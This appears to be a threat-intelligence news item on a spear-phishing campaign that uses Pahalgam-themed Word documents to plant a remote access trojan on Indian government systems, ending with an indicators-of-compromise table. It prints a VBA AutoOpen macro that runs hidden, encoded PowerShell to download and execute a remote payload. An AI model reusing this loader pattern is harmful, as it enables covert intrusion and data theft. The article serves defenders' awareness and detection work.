In a targeted cyber espionage campaign, attackers are using fake documents referencing the recent Pahalgam attack to go after Indian government personnel. Discovered in early May 2025, the campaign relies on spear-phishing emails with attachments meant to exploit officials’ interest in the ongoing security situation.
These emails are crafted to appear as if they come from legitimate government sources, making them more convincing. The attached Word documents contain embedded macros that, once enabled, trigger a multi-stage malware infection.
The malicious documents are disguised as official briefings or intelligence reports about the Pahalgam incident. They prompt recipients to “Enable Content” to view the file, which silently activates hidden malware.
The attackers designed these files with realistic letterheads and formatting to mimic genuine government communications. Seqrite researchers discovered the campaign after noticing unusual network traffic from government systems.
Their analysis revealed a previously unknown Remote Access Trojan (RAT) that stays hidden on infected devices and connects to servers linked to a known nation-state group that has targeted Indian government agencies in the past.
Experts believe this is a highly targeted and sophisticated operation, aimed at collecting sensitive information from defense, intelligence, and law enforcement networks. The campaign’s timing—right after the Pahalgam attack—shows the attackers are using current events to increase their success.
All about the attack
The attack starts when victims open a file named “Pahalgam_Incident_Report_Confidential.docx”. If they enable macros, hidden VBA code runs a PowerShell command to launch the malware.
Sub AutoOpen()
Dim str As String
str = “powershell.exe -nop -w hidden -e JGM9KChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4xMDUvYy5wbmcnKTtpZXggJGM=”
Shell str, vbHide
End Sub
The PowerShell command downloads more malware hidden in a fake PNG file. It sets up persistence using scheduled tasks and Registry changes, then gathers system info, steals data, and tries to spread across government networks.
Indicators of Compromise (IOCs)
| Category | Indicator |
|---|---|
| Phishing Documents | c4fb60217e3d43eac92074c45228506a, 172fff2634545cf59d59c179d139e0aa (examples) |
| Phishing Domains | jkpolice[.]gov[.]in[.]kashmirattack[.]exposed, iaf[.]nic[.]in[.]ministryofdefenceindia[.]org |
| Phishing URLs | hxxps://jkpolice[.]gov[.]in[.]kashmirattack[.]exposed/service/home/ (example) |
| PPAM/XLAM | d946e3e94fec670f9e47aca186ecaabe (example) |
| Crimson RAT | 026e8e7acb2f2a156f8afff64fd54066 (example), IP: 93.127.133.58 (Ports: 1097, etc.) |
Leave A Comment